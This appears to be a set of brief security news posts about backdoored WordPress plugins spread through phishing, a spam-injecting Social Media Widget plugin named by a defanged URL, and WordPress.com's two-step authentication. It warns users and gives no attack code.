WordPress Plugins containing Backdoor distributed via phishing emails

What would you do when you receive an email offering Pro version of Wordpress plugin for free, if you are a WordPress user? Don't get tempted by such kind of emails, they also give malicious code for free!

Sucuri reported about a phishing emails asking their clients to download Pro-version of "All in one SEO Pack" WordPress plugin.  The email claims that the plugin is $79.00 worth and giving it for free.

"You have been chosen by WordPress to take part in our Customer Rewarding Program.  You are the 23rd from 100 uniques winners." The phishing email reads.

Credit : Sucuri

The download link provided in the email is not linked to WordPress plugin store, it is linked to a zip file hosted in a compromised website.

Security researchers at Sucuri analyzed the plugin and found out that it is modified with a Backdoor which gives attackers full access to the server.

The malicious code in the plugin replaces the index.php file with the malicious code retrieved from the attacker's server.  So, when user visit the site, they either redirected to SPAM sites or to Exploit kits where it will infect the visitor's system.

Infected Social media widget plugin puts spam link in 1000s of WordPress sites

If you are using Social Media widget plugin in your WordPress site, make sure to remove it immediately.  Sucuri has discovered that the plugin is being used to inject spam into your site.

The Social Media Widget is a simple sidebar widget that allows users to input their social media website profile URLs and other subscription options to show an icon on the sidebar to that social media site and more that open up in a separate browser window.

It is one of the popular plugin with more than 935,000 downloads, it means thousands of WordPress sites are affected.

According to Sucuri malware report, the plugin has a hidden call to a malicious url "hxxp://i.aaur.net/i.php", which is used to inject "Pay Day Loan" spam into the websites running the plugin.

The malicious code was added only in the latest version of the plugin , SMW 4.0.  Users are recommended to remove the plugin from their sites. The plugin has been removed from the WordPress Plugin repository.

WordPress.com boosts security with Two Step authentication

WordPress.com , a blog web hosting service provided, announced that they have enabled Two-step authentication feature to keep your blogger account secure.

Two factor authentication is a security feature that prompts you to enter a temporary secret number sent to your phone whenever you log into your account.

How to enable Two step authentication in Wordpress?
To enable this feature, go to the new Security tab in your WordPress.com account settings, and go through the setup wizard.

"We know your blog is important to you, and today we’re proud to announce Two Step Authentication: an optional new feature to help you keep your WordPress.com account secure." Wordpress.com blog post reads.